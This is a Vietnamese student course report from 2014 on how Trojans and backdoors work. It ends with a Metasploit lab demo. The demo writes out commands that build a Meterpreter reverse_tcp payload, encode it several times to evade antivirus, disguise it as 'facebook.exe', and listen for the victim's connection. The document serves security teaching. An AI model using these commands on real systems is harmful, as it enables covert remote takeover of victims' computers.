HỌC VIỆN KỸ THUẬT MẬT MÃ
KHOA AN TOÀN THÔNG TIN

AT8A-Tháng 9/2014

MÔN HỌC: CƠ SỞ AN TOÀN THÔNG TIN
Đề tài: Tìm hiểu và xây dựng chương trình
minh họa hoạt động của Backdoor

Giảng viên hướng dẫn : Vũ Đình Thu
Nhóm thực hiện

: Lã Thị Hậu
Bùi Thái Dương
Lê Anh Đức
Nguyễn Tuấn Anh


MỤC LỤC

2|Page
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor


Hình 3.1

Kiểm tra IP

8

Hình 3.2

Tạo Backdoor

8

Hình 3.3

Màn hình console của exploit

9

Hình 3.4

Thao tác mở cổng, chờ kết nối

9

Hình 3.5

File trên máy nạn nhân

10

Hình 3.6

Kết nói được thiết lập

10

Hình 3.7


Kết quả thực thi trên máy nạn nhân

10

DANH MỤC HÌNH ẢNH

3|Page
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor


LỜI MỞ ĐẦU
Cùng với sự phát triển của công nghệ thông tin, công nghệ mạng máy tính và sự
phát triển của mạng Internet thì các dịch vụ mạng đã có mặt trong hầu hết các lĩnh vực
của đời sống xã hội. Các thông tin trên Internet cũng đa dạng về nội dung và hình thức,
trong đó có rất nhiều thông tin cần được bảo mật cao hơn bởi tính kinh tế, tính chính xác
và độ tin cậy của nó.
Bên cạnh sự ra đời và phát triển của công nghệ An ninh Mạng, các hình thức phá
họa mạng cũng trở nên tinh vi và phức tạp hơn. Do đó, đối với mỗi hệ thống, nhiệm vụ
bảo mật được đặt ra cho người quản trị mạng là hết sức quan trọng và cần thiết. Xuất phát
từ những thực tế đó, nhóm chúng em đã tìm hiểu đề tài “Tìm hiểu và xây dựng chương
trình minh họa hoạt động của Backdoor” để có thể đưa cái nhìn tổng quan về loại mã độc
hại này, từ đó phát triển sang các hướng sâu hơn về mã độc hại nói chung.

CHƯƠNG I: TỔNG QUAN VỀ TROJAN VÀ BACKDOOR
1. Giới thiệu về Trojan - Backdoor
- Một Trojan là một chương trình nhỏ chạy chế độ ẩn và gây hại cho máy tính.

4|Page
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor



- Với sự trợ giúp của Trojan, một kẻ tất công có thể dễ dàng truy cập vào máy tính
của nạn nhân để thực hiện một số việc nguy hại như lấy cắp dữ liệu, xóa file, và nhiều khả
năng khác.
- Khái niệm Backdoor được dùng để chỉ những phần mềm độc hại, được tạo ra để
cài, phát tán mã độc vào máy tính người của người dùng.
- Nếu xét về khía cạnh chức năng và kỹ thuật, Backdoor khá giống với hệ thống
quản lý và điều phối phần mềm. Những ứng dụng độc hại này được tạo ra để làm bất cứ
yêu cầu gì mà tin tặc muốn: gửi và nhận dữ liệu, kích hoạt, sử dụng và xóa bất cứ file nào
đó, hiển thị thông báo lỗi, tự khởi động lại máy tính …
- Những chương trình như này thường được sử dụng để liên kết những nhóm máy
tính bị lây nhiễm để tạo nên mô hình mạng botnet hoặc zombie thường gặp. Và những kẻ
đứng đằng sau tổ chức này có thể dễ dàng tập trung 1 số lượng lớn hoặc rất lớn các máy
tính – lúc này đã trở thành công cụ cho tin tặc, nhằm thực hiện những âm mưu hoặc mục
đích xấu.
- Một bộ phận khác của Backdoor cũng có khả năng lây lan và hoạt động giống hệt
với Net-Worm, chúng ta có thể phân biệt chúng qua khả năng lây lan, Backdoor không
thể tự nhân bản và lây lan, trái ngược hoàn toàn với Net-Worm. Nhưng chỉ cần nhận được
lệnh đặc biệt từ phía tin tặc, chúng sẽ đồng loạt lây lan và sản sinh với số lượng không thể
kiểm soát được.

2. Các dạng và cách hoạt động của Trojan
- Kẻ tấn công có thể truy cập được vào các máy tính đã bị nhiễm Trojan khi chúng
Online.
- Kẻ tấn công có thể truy cập và điều khiển toàn bộ máy tính của nạn nhân, và
chúng có khả năng sử dụng vào nhiều mục đích khác nhau.
- Các dạng Trojan cơ bản:
+ Remote Access Trojan – Cho kẻ tấn công kiểm soát toàn bộ hệ thống từ xa.
+ Data-Sending Trojan – Gửi những thông tin nhạy cảm cho kẻ tấn công

+ Destructive Trojan – Phá hủy hệ thống
+ Denied-of-Service – DoS Attack Trojan: Trojan cho tấn công DoS.
+ Proxy Trojan
+ HTTP, FTP Trojan: - Trojan tự tạo thành HTTP hay FTP server để kẻ tấn
công
khai thác lỗi.
5|Page
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor


+ Security Software Disable Trojan – Có tác dụng tắt những tính năng bảo mật
trong máy tính của nạn nhân.
- Mục đích của những kẻ viết ra những Trojans:
+ Lấy thông tin của Credit Card
+ Lấy thông tin của các tài khoản cá nhân như: Email, Password, Usernames,…
+ Những dữ liệu mật.
+ Thông tin tài chính: Tài khoản ngân hàng…
+ Sử dụng máy tính của nạn nhân để thực hiện một tác vụ nào đó, như để tấn
công, scan, hay làm ngập hệ thống mạng của nạn nhân.

3. Những con đường để máy tính nạn nhân nhiễm Trojan
- Qua các ứng dụng CHAT online như IRC – Interney Relay Chat
- Qua các file được đính kèm trên Mail…
- Qua tầng vật lý như trao đổi dữ liệu qua USB, CD, HDD
- Khi chạy một file bị nhiễm Trojan
- Qua NetBIOS – FileSharing
- Qua những chương trình nguy hiểm
- Từ những trang web không tin tưởng hay những website cung cấp phần mềm
miễn phí tràn lan trên mạng.
- Nó có khả năng ẩn trong các ứng dụng bình thường, khi chạy ứng dụng đó lập tức

cũng chạy luôn Trojan.

4. Các Port sử dụng bởi các Trojan phổ biến
- Back Orifice – Sử dụng UDP protocol – Sử dụng Port 31337 và 31338
- Deep Throat – Sử dụng UDP protocol – Sử dụng Port 2140 và 3150
- NetBus – Sử dụng TCP Protocol – Sử dụng Port 12345 và 12346
- Whack-a-mole – Sử dụng TCP – Qua Port 12361 và 12362
- Netbus 2 Pro – Sử dụng TCP – Qua Port 20034
- GirlFriend - Sử dụng Protocol TCP – Qua Port 21544

6|Page
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor


CHƯƠNG 2: SYSTEM HACKING
1. Giới thiệu về Metasploit
- Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ
hổng bảo mật cũng như giúp đỡ về kiểm tra thâm nhập và phát triển hệ thống phát hiện
tấn công mạng. Một dự án con rất nổi tiếng của Metasploit là Metasploit Framework.
- Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai
thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với
những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên
hầu hết các hệ điều hành: Linux, Windows, MacOS.
- Metasploit gồn 4 thành phần cơ bản là:
+ Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng các
dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.
+ Web interface: Dùng msfweb giao tiếp với người dùng thông qua giao diện
web
+ Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg,
những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module

exploits.
+ Temporary Enviroment: được thực thi thông qua 2 câu lệnh set và unset,
enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng
đến các module exploit khác.

2. Sử dụng Metaspolit Frameworks
Các bước được thực hiện tuần tự như sau:
7|Page
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor


- Chọn module exploit
- Cấu hình exploit đã chọn
- Kiểm tra những cấu hình vừa thiết lập
- Lựa chọn mục tiêu
- Lựa chọn Payload
- Thực thi exploit

3. Payload Meterpreter
- Meterpreter, viết tắt từ Meta-Interpreter là một payload nâng cao có trong
Metasploit Framework. Mục đích của nó là để cung cấp những tập lệnh để khai thác, tấn
công các máy remote computers. Nó được viết từ các developers dưới dạng shared object
(DLL) files. Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn
toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống
virus.

4. Các lỗi liên quan đến system hacking
- Lỗi MS10-046 (2286198):
+ Đây là một lỗi rất nghiêm trọng liên quan đến Windows Shell của cho tất cả
các hệ điều hành bị ảnh hưởng, cho phép kẻ tấn công chiếm lấy toàn quyền điều

khiển Windows và thực thi mã nguồn từ xa. Lỗi này được phát hiện vào tháng
06/2010 và đến tháng 08/2010, Microsoft tung ba bản vá lỗi.
+ Lỗi nguy hiểm này nằm trong các tập tin "shortcut" (*.lnk) của Windows, các
tập tin này thường nằm ở giao diện desktop hay trình đơn Start. Bằng cách tạo ra
một tập tin shortcut nhúng mã độc, tin tặc có thể tự động thực thi mã độc khi
người dùng xem tập tin shortcut hay nội dung của một thư mục chứa tập tin
shortcut nhúng mã độc.
- Lỗi BYPASSUAC:
+ Từ Windows Vista trở về sau, Microsoft đã giới thiệu một tiện ích được xây
dựng sẵn là User Access Control (UAC). UAC làm tăng tính bảo mật của
Windows bằng cách giới hạn các phần mềm ứng dụng của nhóm quyền người sử
dụng cơ bản. Vì vậy, chỉ những phần mềm được người dùng tin tưởng mới nhận
được quyền quản trị, những phần mềm khác thì không. Tuy nhiên, với tài khoản
của người quản trị, các ứng dụng vẫn bị giới hạn như những tài khoản thường
khác.
8|Page
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor


+ Các hệ điều hành có tích hợp sẵn User Access Control điều bị ảnh hưởng và
có thể khai thác.

CHƯƠNG 3: DEMO CHƯƠNG TRÌNH TẠO BACKDOOR VỚI
METASPLOIT
1. Mục tiêu
- Công cụ sử dụng: Backtrack 5 R3
- Mục tiêu: Sử dụng Backdoor để Remote Windows, dựa trên nguyên lý hoạt động
của Backdoor.

2. Các bước thực hiện

- Bước 1: Sử dùng lệnh ifconfig kiểm tra IP của máy Backtrack. Ở đây IP máy
acktrack là 192.168.1.2

Hình 3.1: Kiểm tra IP
- Bước 2: Tạo Backdoor
msfpayload
windows/meterpreter/reverse_tcp

LHOST=192.168.1.1

LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x
/root/Desktop/facebook.exe

Hình 3.2: Tạo Backdoor
Trong đó:
+ LHOST: Địa chỉ IP máy Backtrack
+ LPORT: Cổng máy local
9|Page
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor


+ Encode sử dụng shikata_ga_nai, bypass 5 lần
+ Lưu file Backdoor dưới tên facebook.exe và đặt ở Desktop.
- Bước 3: Lắng nghe chờ đợi kết nối
+ Chuyển đến thư mục chứa framework của Metasploit, mở màn hình console
để thao tác lệnh
cd /pentest/exploits/framework3
msfconsole

Hình 3.3: Màn hình console của exploit

+ Thao tác mở cổng, lắng nghe kết nối
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
set channel 1
exploit

Hình 3.4: Thao tác mở cổng, chờ kết nối
- Bước 4: Gửi file sang máy nạn nhân

10 | P a g e
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor


Hình 3.5: File trên máy nạn nhân
- Bước 5: Khi máy nạn nhận thực thi file, kết nối sẽ được thiết lập

Hình 3.6: Kết nối được thiết lập
- Bước 6: Thi hành vài quyền kiểm soát cơ bản

Hình 3.7: Kết quả thực thi trên máy nạn nhân

KẾT LUẬN
Qua việc nghiên cứu và tìm hiểu đề tài, chúng ta có thể hiểu hơn về các mối đe dọa
về an toàn thông tin, cũng như biết thêm về một trong những kỹ thuật tấn và bảo vệ cho

11 | P a g e
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor



hệ thống. Trên cơ sở đó, đề tài có thể mở rộng hướng phát triển theo nhiều hướng khác
nhau, đi sâu hơn về các loại mã độc cụ thể hay khai thác các công cụ bảo mật khác.
Sau khi nghiên cứu tiểu luận môn học này, nhóm sẽ cố gắng khắc phục những vấn
đề tồn tại và mở rộng đề tài để có thể thiết thực hơn với công việc học tập và việc sử dụng
máy tính rộng rãi như hiện nay.

TÀI LIỆU THAM KHẢO
- Tấn công và Bảo vệ hệ thống – I Train (Tocbatdat)
- Backtrack 5 Basic Tutorial – Athena Academy
- “Tấn công bằng mã độc” – Trương Minh Nhật Quang (Security BootCamp)
- “Viruses” - Client Services – IT Education and Training Team

12 | P a g e
Tìm hiểu và xây dựng chương trình minh họa hoạt động của Backdoor